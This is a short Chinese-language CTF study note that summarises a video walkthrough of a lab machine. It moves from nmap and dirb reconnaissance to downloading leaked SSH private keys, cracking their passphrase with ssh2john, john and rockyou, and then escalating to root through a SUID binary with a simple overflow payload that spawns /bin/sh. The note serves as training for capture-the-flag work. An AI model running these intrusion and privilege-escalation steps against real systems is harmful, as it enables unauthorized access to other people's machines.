CTF 私钥泄露学习笔记

你说的曾经没有我的故事 提交于 2020-04-05 18:55:59

B站视频https://www.bilibili.com/video/BV1z4411K7Pt?p=3

1.信息探测
对ip地址扫描,探测开放服务。
渗透其实是针对服务的漏洞探测,然后进行对应数据包发送,获取最高权限
- nmap -sV ip地址   挖掘开放服务信息
 
2.分析探测结果
每一服务对应计算机一个端口,在扫描结果中查找特殊端口

针对特殊端口探测,尤其对开发大端口的http服务进行排查

3.探测大端口信息
对于开放http服务大端口,可以采取http://ip地址:port端口/的形式访问;
查看源代码获取对应信息;若无flag信息,使用工具探测隐藏页面
-dirb http://ip地址:port端口/对该服务隐藏文件探测

4.针对隐藏页面分析
直接用浏览器访问,查看效果

挖掘ssh信息,不断访问获取更多泄露ssh密钥 (ssh作用:使远程计算机通过ssh客户端登录到本地服务器的ssh服务上,
实现远程计算机对服务器的远程操作

步骤:
打开.ssh文件,
下载两个私钥文件,
cd Desktop/切换到桌面,
ls -alh 查看权限,

chmod 600 id_isa,(赋予读写权限)
ssh -i id_rsa simon@192.168.253.10



5.解密 ssh密钥信息
使用 ssh2jhn 将id_isa密钥信息转换为john可以识别的信息
chmod 600 id_isa
ssh2john id_isa > isacrack

利用字典解密isacrack信息
zcat /usr/share/wordlists/rockyou.txt.gz |john --pipe -
-rules isacrack
(|管道符号)
输入破解密码,远程登陆主机,
cd /root(深入根目录)
ls
cat flag.txt(提示权限不够,simon只是一个普通用户)
 
查找具有root权限的文件
- find / -perm -4000 2>/dev/null
(-perm -4000表示具有执行权限
2>/dev/null避免错误输出)

cat read message.c,  读取到flag2
read_message,
SimonAAAAAAAAAAAAAAAAAAAA/bin/sh  提权
pwd,
whoami,
结果:root
cat flag.txt  读取到flag3

标签
易学教程内所有资源均来自网络或用户发布的内容,如有违反法律规定的内容欢迎反馈
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!